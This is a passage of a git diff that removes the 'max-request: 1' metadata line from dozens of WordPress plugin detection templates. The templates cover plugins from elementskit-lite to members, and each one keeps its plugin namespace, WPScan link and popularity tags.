+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
-    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
